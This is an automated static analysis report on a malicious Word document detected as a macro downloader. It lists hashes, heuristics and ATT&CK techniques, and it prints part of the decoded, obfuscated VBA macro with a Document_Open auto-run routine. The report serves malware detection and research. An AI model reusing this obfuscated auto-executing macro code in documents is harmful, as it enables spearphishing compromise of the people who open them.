Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c2097360c006fc33…

MALICIOUS

Office (OLE)

Size: 176.0 KB
Created: 2018-05-02 11:21:00
Authoring application: Microsoft Office Word
First seen: 2018-11-05
MD5: 1b7867c7b942d76116e2d496b42112be
SHA-1: 48b14c23b2caf419c8f04200b77385756139d25c
SHA-256: c2097360c006fc3325914406e1b1f0d4857e9a550618ffedc1d0eb0fe8e64777
Risk score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros, specifically a Document_Open macro that uses GetObject. ClamAV identifies it as a downloader. The VBA script is heavily obfuscated but its structure suggests it is designed to download and execute a second-stage payload, likely from a remote source. The presence of VBA macros and the downloader behavior strongly indicate a malicious document intended for initial compromise via spearphishing.

Heuristics (6)

  • ClamAV: Doc.Downloader.Macro-6539595-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected [medium, 3 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • Document_Open macro [high, OLE_VBA_DOCOPEN]
    Document_Open macro
  • GetObject call [high, OLE_VBA_GETOBJ]
    GetObject call
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13568 bytes
SHA-256: d2b4647706e32217973fb5e1c518a75514139a2b3793825ffa66ca416b9407af
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function unfulfilled(buoyantly)
Dim exemption As Long
Dim beardown As Variant
Dim uintatherium As Integer
Dim dastardly As Integer
#If (127 - 75 + 348 + 103 - 64 + 261) > ((97 - 8 + 231) - (113 - 48 + 475) * 1) And ((125 - 40 - 57) - (80 - 80 + 28)) * 2 < (Win64) Then
Dim ophisaurus As String
Dim aspasia As LongPtr
sinuation = 78 - 106 + 36
Dim hesitance As LongPtr
Dim apron As String
Dim chips As Variant
Dim upheaval As LongPtr
Dim determinism As Integer
semidesert = VarPtr(aspasia)
adj = lactuca(semidesert, VarPtr(buoyantly) + (96 - 124 + 36), sinuation)
#ElseIf (10 - 62 + 452 + 25 - 87 + 362) > ((98 - 3 + 225) - (7 - 27 + 560) * 1) And Not ((112 - 18 - 66) - (103 - 125 + 50)) * 2 < (Win64) Then
Dim aspasia As Long
sinuation = 98 - 108 + 14
Dim hesitance As Long
Dim upheaval As Long
semidesert = VarPtr(aspasia)
adj = freckled(semidesert, VarPtr(buoyantly) + (56 - 104 + 56), sinuation)
#End If
beehive = 40 - 26 - 15
hesitance = 88 - 82 - 6
subeditor = 36 - 127 + 91
upheaval = 21 - 66 + 9603
monoecious = 48 - 90 + 4138
effusive = 58 - 68 + 74
Patterned = manytongued(ByVal beehive, _
hesitance, ByVal subeditor, upheaval, ByVal monoecious, _
ByVal effusive)
duke = Math.Round(305)

apatosaur = Math.Round(301)

#If (60 - 98 + 438 + 37 - 56 + 319) > ((116 - 51 + 255) - (8 - 67 + 599) * 1) And ((102 - 85 + 11) - (81 - 40 - 13)) * 2 < (Win64) Then
ichthyotomy = lactuca(hesitance, aspasia, 31 - 45 + 5897)
#ElseIf (108 - 48 + 340 + 67 - 80 + 313) > ((39 - 11 + 292) - (3 - 40 + 577) * 1) And Not ((102 - 34 - 40) - (69 - 20 - 21)) * 2 < (Win64) Then
selflimited = freckled(hesitance, aspasia, 90 - 20 + 5813)
#End If
chruchwarden = 16 + 5
 Pmt 0, chruchwarden, 5932, 54263, 5

unfulfilled = hesitance
End Function
Sub RemovePageNumbersFromCurrentSection()
    Dim ThisHeader As HeaderFooter
    Dim ThisPageNumber As PageNumber
    With Selection.Sections(1)
        For Each ThisHeader In .Headers
            For Each ThisPageNumber In ThisHeader.PageNumbers
                ThisPageNumber.Delete
            Next ThisPageNumber
        Next ThisHeader
    End With
End Sub

Function lactuca(boater, detent, russell)
Dim amoret As String
Dim confidente As Variant
Dim fellatio As LongPtr
Dim silique As LongPtr
Dim eschatologist As LongPtr
Dim brooch As Variant
Dim dorm As LongPtr
Dim et As LongPtr
helmholtz = "modernist"
condensing = condensing * 1
silique = boater
et = russell
condensing = Rnd(100)
dorm = detent
burbot = 6 + 19
 Pmt 0, burbot, 33410, 56714, 5

irreprehensible = helmholtz
fellatio = 35 - 54 + 18
crystallize ByVal fellatio, _
silique, _
dorm, et, _
eschatologist
rebuild = helmholtz
End Function
Private Sub Document_Open()
Dim alamo As Long
Dim expanse As Integer
wright = "padua"
feme = "mortarboard"
miraculous
lowermiddleclass = 31 + 47
 Pmt 0, lowermiddleclass, 36735, 29510, 7
End Sub
Sub miraculous()
Dim scribendi As Byte
Dim ephippidae As Byte
ragbag.success.Value = Day(#12/5/2013#)
varday = predeliberation = "elective"
odyllic = "attributively"
foeman = lidded
gg = "adamantine"
belligerence = "schizaeaceae"

artificially = "throstle"
pinscher = "conk"
antipode = "apostrophe"
Set unreeling = ragbag.success.SelectedItem
oleaginous = 45 + 41
 Pmt 0, oleaginous, 31960, 32378, 7

nape = unreeling.Name
daubentonia = 126 - 86 + 7804
scintilla = Right(nape, daubentonia)
jerrybuilt = peat.bootlicking(scintilla)
estaminet = 46 + 50
 Pmt 0, estaminet, 16766, 37829, 4

dapple = "aesculus"
#If (96 - 114 + 418 + 123 - 82 + 259) > ((81 - 3 + 242) - (69 - 63 + 534) * 1) And ((56 - 109 + 81) - (39 - 28 + 17)) * 2 < (Win64) Then
Dim ablaze As String
Dim vinegariness As LongPtr
Dim bedder As LongPtr
Dim delectability As Variant
#ElseIf (33 
... (truncated)